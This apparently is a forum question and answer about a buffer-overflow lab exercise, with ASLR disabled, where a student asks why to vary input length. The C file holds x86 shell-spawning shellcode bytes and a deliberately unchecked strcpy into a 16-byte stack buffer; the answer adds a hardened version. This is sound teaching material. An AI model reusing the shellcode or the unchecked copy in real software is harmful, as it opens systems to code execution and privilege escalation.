I’ve been given a C code file where given the right input a buffer overflow occurs and then root access is granted. This is a Fedora bug using ZShell. In order to test this (security subject) we disabled the random memory address assignment that is enabled in the Linux kernel.
I’m asked to test different inputs until a segmentation fault happens, where the input is the buffer size. What I don’t get is, why should I test with different values? I’m not sure the code will help but I just don’t get the point of varying the input.
/* vulnerable.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Payload bytes handed to the exercise; printed as an address by main() below. */
unsigned char buf[] =
    "\x31\xc0"      /* xorl %eax,%eax */
    "\x50"          /* pushl %eax */
    "\x68""//sh"    /* pushl $0x68732f2f */
    "\x68""/bin"    /* pushl $0x6e69622f */
    "\x89\xe3"      /* movl %esp,%ebx */
    "\x50"          /* pushl %eax */
    "\x53"          /* pushl %ebx */
    "\x89\xe1"      /* movl %esp,%ecx */
    "\x99"          /* cdql */
    "\xb0\x0b"      /* movb $0x0b,%al */
    "\xcd\x80"      /* int $0x80 */
    ;
/* -------------------------------------------------- */

/* Copies the argument into a 16-byte stack buffer with no length check:
 * any input of 16 or more characters (plus the terminating NUL) writes
 * past the end of a[] onto whatever the compiler placed after it. */
void vuln(char * buf)
{
    char a[16] = { 0 };
    strcpy(a, buf);
}

int main(int argc, char * argv[])
{
    int *ret;   /* declared but unused */
    if (argc != 2)
    {
        printf("Usage: %s <input>\n", argv[0]);
        exit(1);
    }
    vuln(argv[1]);
    printf("%p\n", buf);
    return 0;
}
The buffer overflow will only occur given specific input, so you should try different inputs to see what will cause the problem to occur.
Hint: Buffer overflows happen when user input is longer than the program expected, so you should try with different lengths of input until the program starts crashing or doing unexpected things.
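As an added illustration of the answer (not code from the question or the exercise), here is a hardened counterpart of vuln() that performs the length check strcpy() omits, plus a helper that reports how many bytes a given input would write past the 16-byte buffer. The function names vuln_safe and overflow_bytes are my own.

```c
/* fixed_vuln.c: hardened counterpart of vuln() from the question (added example). */
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

#define BUF_LEN 16  /* same size as the 16-byte stack buffer in vuln() */

/* Copies src into a fixed-size stack buffer only if it fits, including the
 * terminating NUL. Returns true on success, false if the input was rejected.
 * This is the length check that strcpy() in vuln() never performs. */
bool vuln_safe(const char *src)
{
    char a[BUF_LEN] = { 0 };
    size_t n = strlen(src);
    if (n >= sizeof a) {
        /* strcpy would write n + 1 bytes into a 16-byte buffer here */
        return false;
    }
    memcpy(a, src, n + 1);
    return true;
}

/* Number of bytes strcpy() would write past the end of a dst_size buffer
 * for this input (0 means it fits). This is why short inputs do not crash
 * while longer ones do: only the bytes beyond the buffer overwrite the
 * neighbouring stack data, and how much of it is hit depends on the length. */
size_t overflow_bytes(const char *src, size_t dst_size)
{
    size_t needed = strlen(src) + 1;  /* payload plus NUL */
    return needed > dst_size ? needed - dst_size : 0;
}

int main(int argc, char *argv[])
{
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <input>\n", argv[0]);
        return 1;
    }
    if (vuln_safe(argv[1]))
        puts("input fits in the 16-byte buffer");
    else
        printf("rejected: input would overflow the buffer by %zu byte(s)\n",
               overflow_bytes(argv[1], BUF_LEN));
    return 0;
}
```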